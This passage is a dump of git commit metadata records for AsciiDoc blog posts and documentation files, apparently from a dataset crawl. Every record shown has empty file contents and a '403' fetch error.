2017-02-22-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-22-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","new_file":"_posts\/2017-02-22-We-Arent-Dead-Yet-Hub-Press-Roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fac1a9f9953e2324a67454e1f5646e02969ad0fa","subject":"Deleted 2015-09-2-Daisies-arent-roses.adoc","message":"Deleted 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"429bac49e0e6e94544a91b09fcf8a72094b19011","subject":"y2b create post S6 Active - Best Phone Right Now?","message":"y2b create post S6 Active - Best Phone Right Now?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-09-S6-Active--Best-Phone-Right-Now.adoc","new_file":"_posts\/2015-07-09-S6-Active--Best-Phone-Right-Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1a1b55c251a8495b6e01d9270d67425564e3c3b","subject":"Update 2015-06-21-suzakinishi.adoc","message":"Update 2015-06-21-suzakinishi.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-21-suzakinishi.adoc","new_file":"_posts\/2015-06-21-suzakinishi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92513f21da119e039a50b6d679543e6cdfd76d77","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a25e05d61876e5a41797e21847d9733c7d18bb0d","subject":"Added Python language to Gitbook","message":"Added Python language to 
Gitbook\n","repos":"DariusX\/camel,tadayosi\/camel,JYBESSON\/camel,neoramon\/camel,ssharma\/camel,NickCis\/camel,zregvart\/camel,yuruki\/camel,pax95\/camel,objectiser\/camel,bgaudaen\/camel,cunningt\/camel,Thopap\/camel,tdiesler\/camel,yuruki\/camel,tadayosi\/camel,drsquidop\/camel,RohanHart\/camel,lburgazzoli\/apache-camel,prashant2402\/camel,prashant2402\/camel,adessaigne\/camel,jonmcewen\/camel,allancth\/camel,bhaveshdt\/camel,ssharma\/camel,anton-k11\/camel,jarst\/camel,isavin\/camel,zregvart\/camel,tlehoux\/camel,sabre1041\/camel,scranton\/camel,driseley\/camel,kevinearls\/camel,apache\/camel,tkopczynski\/camel,chirino\/camel,JYBESSON\/camel,dmvolod\/camel,jamesnetherton\/camel,akhettar\/camel,nicolaferraro\/camel,pkletsko\/camel,curso007\/camel,adessaigne\/camel,tkopczynski\/camel,yuruki\/camel,acartapanis\/camel,onders86\/camel,Fabryprog\/camel,sabre1041\/camel,kevinearls\/camel,tadayosi\/camel,pax95\/camel,DariusX\/camel,bgaudaen\/camel,pax95\/camel,sverkera\/camel,salikjan\/camel,kevinearls\/camel,bgaudaen\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,apache\/camel,gilfernandes\/camel,tkopczynski\/camel,neoramon\/camel,CodeSmell\/camel,acartapanis\/camel,curso007\/camel,tkopczynski\/camel,jarst\/camel,cunningt\/camel,JYBESSON\/camel,pkletsko\/camel,isavin\/camel,pkletsko\/camel,pmoerenhout\/camel,w4tson\/camel,veithen\/camel,yuruki\/camel,alvinkwekel\/camel,hqstevenson\/camel,allancth\/camel,dmvolod\/camel,pmoerenhout\/camel,anton-k11\/camel,christophd\/camel,rmarting\/camel,nikhilvibhav\/camel,sirlatrom\/camel,NickCis\/camel,snurmine\/camel,tadayosi\/camel,pmoerenhout\/camel,davidkarlsen\/camel,rmarting\/camel,snurmine\/camel,dmvolod\/camel,isavin\/camel,bhaveshdt\/camel,mcollovati\/camel,scranton\/camel,nboukhed\/camel,gautric\/camel,gnodet\/camel,scranton\/camel,onders86\/camel,alvinkwekel\/camel,neoramon\/camel,RohanHart\/camel,curso007\/camel,allancth\/camel,rmarting\/camel,NickCis\/camel,w4tson\/camel,sirlatrom\/camel,ssharma\/camel,mcollovati\/camel,drsquidop\/camel,cunningt\/camel,hqstevenson\/camel,jkorab\/camel,bgaudaen\/camel,punkhorn\/camel-upstream,tadayosi\/camel,ssharma\/camel,jamesnetherton\/camel,pmoerenhout\/camel,gnodet\/camel,sverkera\/camel,Fabryprog\/camel,ssharma\/camel,neoramon\/camel,christophd\/camel,tdiesler\/camel,hqstevenson\/camel,anoordover\/camel,snurmine\/camel,veithen\/camel,jarst\/camel,acartapanis\/camel,CodeSmell\/camel,akhettar\/camel,cunningt\/camel,nikhilvibhav\/camel,mgyongyosi\/camel,sirlatrom\/camel,nboukhed\/camel,scranton\/camel,gautric\/camel,onders86\/camel,rmarting\/camel,yuruki\/camel,veithen\/camel,jkorab\/camel,cunningt\/camel,akhettar\/camel,sabre1041\/camel,anton-k11\/camel,sverkera\/camel,jonmcewen\/camel,objectiser\/camel,gautric\/camel,ullgren\/camel,scranton\/camel,NickCis\/camel,Thopap\/camel,lburgazzoli\/apache-camel,isavin\/camel,nboukhed\/camel,nboukhed\/camel,sabre1041\/camel,JYBESSON\/camel,chirino\/camel,mgyongyosi\/camel,jonmcewen\/camel,sirlatrom\/camel,sverkera\/camel,pkletsko\/camel,isavin\/camel,w4tson\/camel,Thopap\/camel,driseley\/camel,salikjan\/camel,mgyongyosi\/camel,gilfernandes\/camel,kevinearls\/camel,gautric\/camel,neoramon\/camel,lburgazzoli\/camel,lburgazzoli\/apache-camel,RohanHart\/camel,mgyongyosi\/camel,chirino\/camel,ssharma\/camel,onders86\/camel,curso007\/camel,sabre1041\/camel,jonmcewen\/camel,nboukhed\/camel,christophd\/camel,chirino\/camel,jamesnetherton\/camel,anoordover\/camel,jonmcewen\/camel,gilfernandes\/camel,ullgren\/camel,nikhilvibhav\/camel,lburgazzoli\/apache-camel,dmvolod\/camel
,onders86\/camel,JYBESSON\/camel,NickCis\/camel,rmarting\/camel,objectiser\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,christophd\/camel,pmoerenhout\/camel,drsquidop\/camel,prashant2402\/camel,anoordover\/camel,curso007\/camel,bhaveshdt\/camel,scranton\/camel,jkorab\/camel,kevinearls\/camel,sverkera\/camel,anoordover\/camel,nikhilvibhav\/camel,acartapanis\/camel,onders86\/camel,anton-k11\/camel,snurmine\/camel,mgyongyosi\/camel,ullgren\/camel,tdiesler\/camel,gnodet\/camel,CodeSmell\/camel,pmoerenhout\/camel,RohanHart\/camel,adessaigne\/camel,acartapanis\/camel,RohanHart\/camel,sverkera\/camel,allancth\/camel,driseley\/camel,sirlatrom\/camel,Fabryprog\/camel,gautric\/camel,veithen\/camel,tlehoux\/camel,dmvolod\/camel,mcollovati\/camel,anton-k11\/camel,gautric\/camel,drsquidop\/camel,jkorab\/camel,akhettar\/camel,drsquidop\/camel,neoramon\/camel,christophd\/camel,Thopap\/camel,allancth\/camel,veithen\/camel,w4tson\/camel,driseley\/camel,jamesnetherton\/camel,pkletsko\/camel,mcollovati\/camel,dmvolod\/camel,akhettar\/camel,bgaudaen\/camel,w4tson\/camel,Thopap\/camel,gilfernandes\/camel,snurmine\/camel,jarst\/camel,davidkarlsen\/camel,nicolaferraro\/camel,lburgazzoli\/camel,tadayosi\/camel,lburgazzoli\/camel,tdiesler\/camel,tkopczynski\/camel,pkletsko\/camel,yuruki\/camel,curso007\/camel,zregvart\/camel,hqstevenson\/camel,bhaveshdt\/camel,veithen\/camel,acartapanis\/camel,anoordover\/camel,Thopap\/camel,apache\/camel,apache\/camel,jarst\/camel,akhettar\/camel,prashant2402\/camel,gilfernandes\/camel,DariusX\/camel,objectiser\/camel,adessaigne\/camel,rmarting\/camel,snurmine\/camel,tlehoux\/camel,JYBESSON\/camel,gilfernandes\/camel,bhaveshdt\/camel,jamesnetherton\/camel,hqstevenson\/camel,driseley\/camel,mgyongyosi\/camel,sabre1041\/camel,anton-k11\/camel,Fabryprog\/camel,gnodet\/camel,drsquidop\/camel,pax95\/camel,ullgren\/camel,jonmcewen\/camel,nicolaferraro\/camel,lburgazzoli\/camel,bhaveshdt\/camel,anoordover\/camel,jkorab\/camel,CodeSmell\/camel,nboukhed\/camel,adessaigne\/camel,christophd\/camel,pax95\/camel,tdiesler\/camel,bgaudaen\/camel,allancth\/camel,RohanHart\/camel,tlehoux\/camel,lburgazzoli\/camel,chirino\/camel,jkorab\/camel,prashant2402\/camel,cunningt\/camel,w4tson\/camel,zregvart\/camel,davidkarlsen\/camel,driseley\/camel,apache\/camel,davidkarlsen\/camel,tlehoux\/camel,nicolaferraro\/camel,adessaigne\/camel,DariusX\/camel,tlehoux\/camel,chirino\/camel,tkopczynski\/camel,punkhorn\/camel-upstream,kevinearls\/camel,pax95\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,jarst\/camel,NickCis\/camel,hqstevenson\/camel,gnodet\/camel,lburgazzoli\/camel,apache\/camel,tdiesler\/camel,alvinkwekel\/camel,jamesnetherton\/camel,isavin\/camel,prashant2402\/camel","old_file":"components\/camel-script\/src\/main\/docs\/python-language.adoc","new_file":"components\/camel-script\/src\/main\/docs\/python-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c6901215ace238f2e179991399ba0fdf789a6d6","subject":"Delete 2016-02-26-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","message":"Delete 
2016-02-26-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","new_file":"_posts\/2016-02-26-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1759691bfce6c42c31827aaa14ace60fd40389ac","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2c1551e046d31359b06f31b4bb9f5f6ce5d838b","subject":"Update 2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","message":"Update 2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","new_file":"_posts\/2017-04-07-Primi-giorni-al-Castello-Alcuni-incontri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e294608c7cc87c26179e3dfcca9ccc208700ea07","subject":"Update 2017-12-17-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2017-12-17-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-17-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2017-12-17-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfefe88ffbb1320b9b702553148129a0bc4b53cc","subject":"0.10.0.Alpha2 release announcement","message":"0.10.0.Alpha2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-06-03-debezium-0-10-0-alpha2-released.adoc","new_file":"blog\/2019-06-03-debezium-0-10-0-alpha2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65e796d6e96cebcb3a3cdcd17dd6456e1da74cc9","subject":"Update 2015-08-08-Demo-Tittle.adoc","message":"Update 
2015-08-08-Demo-Tittle.adoc","repos":"lucasferraro\/lucasferraro.github.io,lucasferraro\/lucasferraro.github.io,lucasferraro\/lucasferraro.github.io","old_file":"_posts\/2015-08-08-Demo-Tittle.adoc","new_file":"_posts\/2015-08-08-Demo-Tittle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lucasferraro\/lucasferraro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62c270e4f23094b8a4730b830624c3c59abf9396","subject":"Publish 2016-08-27.adoc","message":"Publish 2016-08-27.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"2016-08-27.adoc","new_file":"2016-08-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d1d600a7321af785e0d753612cd4ff37aad6ffa","subject":"Update 2017-09-01-Welcome-friends.adoc","message":"Update 2017-09-01-Welcome-friends.adoc","repos":"rishipatel\/rishipatel.github.io,rishipatel\/rishipatel.github.io,rishipatel\/rishipatel.github.io,rishipatel\/rishipatel.github.io","old_file":"_posts\/2017-09-01-Welcome-friends.adoc","new_file":"_posts\/2017-09-01-Welcome-friends.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rishipatel\/rishipatel.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c4b773ce8ee28b521e932055319065fde5aae1b","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2899957ddc4dd26b109024a9b281c6575511be6","subject":"Update 2017-04-14-First-things-first.adoc","message":"Update 2017-04-14-First-things-first.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-04-14-First-things-first.adoc","new_file":"_posts\/2017-04-14-First-things-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f88d2f83adc37a6f2a5072cfaf1205b1ca8f7f9","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0039ff0a858bec234d60b2b180e40e2e47f5a720","subject":"Add readme file.","message":"Add readme file.\n","repos":"hoadlck\/dda,hoadlck\/dda","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoadlck\/dda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"269273c3c8bfa05e7a3ce9115f2b063c5024f8af","subject":"Blog: Distributed tracing workshop and OTSC (#284)","message":"Blog: Distributed tracing workshop and OTSC (#284)\n\n* Blog: Distributed tracing workshop and OTSC\r\n\r\n* readable link to ot\/spec PR\r\n\r\n* Corrected typos\r\n\r\n* Agenda, OTSC more info\r\n\r\n* OTSC in full form\r\n","repos":"objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/03\/15\/hawkular-opentracing-otsc.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/03\/15\/hawkular-opentracing-otsc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23c77585d4b083220ff116df56988f344b9bfdd4","subject":"add news about WildFly 11 messaging features","message":"add news about WildFly 11 messaging features\n","repos":"stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org","old_file":"news\/2017-10-03-Messaging-features.adoc","new_file":"news\/2017-10-03-Messaging-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stuartwdouglas\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"355dbd84a35e44110f81a923fee53e0d75a9fdfb","subject":"Update 2015-11-01-Enlaces-Utiles-Sysadmin.adoc","message":"Update 2015-11-01-Enlaces-Utiles-Sysadmin.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Enlaces-Utiles-Sysadmin.adoc","new_file":"_posts\/2015-11-01-Enlaces-Utiles-Sysadmin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cf3d77ef7cc5b0e2223cbafba105511cbfe5920","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 
2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eac9429191de91d49df79c9c0c6dd05b89b6002","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e818469ed135a1234cae0ba1b6fe353304e5d5fa","subject":"Update 2016-10-17-Stacks-Queues-and-Shunting-Yards.adoc","message":"Update 2016-10-17-Stacks-Queues-and-Shunting-Yards.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-17-Stacks-Queues-and-Shunting-Yards.adoc","new_file":"_posts\/2016-10-17-Stacks-Queues-and-Shunting-Yards.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b56bfd67fd1bfe2d80f22773b6614703999e4d6","subject":"y2b create post The Coolest Padlock In The World!","message":"y2b create post The Coolest Padlock In The World!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-07-The-Coolest-Padlock-In-The-World.adoc","new_file":"_posts\/2017-07-07-The-Coolest-Padlock-In-The-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70132d4bfd1273d6e6bf0f8d05aa67653a161f87","subject":"y2b create post Room Tour \\u0026 Gaming Setup?","message":"y2b create post Room Tour \\u0026 Gaming Setup?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-20-Room-Tour-u0026-Gaming-Setup.adoc","new_file":"_posts\/2011-12-20-Room-Tour-u0026-Gaming-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a5ca54e3248a5195b56c61a3b14b3d2e8c74dad","subject":"Update 2015-06-03-RIP-Postachio-and-Cilantroio.adoc","message":"Update 
2015-06-03-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-03-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/2015-06-03-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a65014e93c410beb691a422de4ce72651058b24","subject":"y2b create post Limited Edition Oppo R7 Plus","message":"y2b create post Limited Edition Oppo R7 Plus","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-17-Limited-Edition-Oppo-R7-Plus.adoc","new_file":"_posts\/2015-10-17-Limited-Edition-Oppo-R7-Plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a559187cca7eb4c816248c472f02d38e068476a7","subject":"Update 2017-12-03-Visual-studio-code-extension.adoc","message":"Update 2017-12-03-Visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-Visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-Visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced0d99985b55275d92c2a7bb09e319964927c10","subject":"Update 2013-04-24-yahoomail-gmail-user-experience.adoc","message":"Update 2013-04-24-yahoomail-gmail-user-experience.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-04-24-yahoomail-gmail-user-experience.adoc","new_file":"_posts\/2013-04-24-yahoomail-gmail-user-experience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ac58270d65488dd3cc6b31e864a03dd0c5bf656","subject":"y2b create post Unboxing The World's Smallest Phone","message":"y2b create post Unboxing The World's Smallest Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-06-Unboxing%20The%20World's%20Smallest%20Phone.adoc","new_file":"_posts\/2018-01-06-Unboxing%20The%20World's%20Smallest%20Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"071468284bb1e2885743f845446ee9ced347b5a8","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 
2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a72a97fa600c227db7b8499d1b4a7bc6d5d2d840","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bf628fc4f100ceecc10a12a683a33beaedb738d","subject":"Update 2016-10-06-Blockchain-for-healthcare-industry.adoc","message":"Update 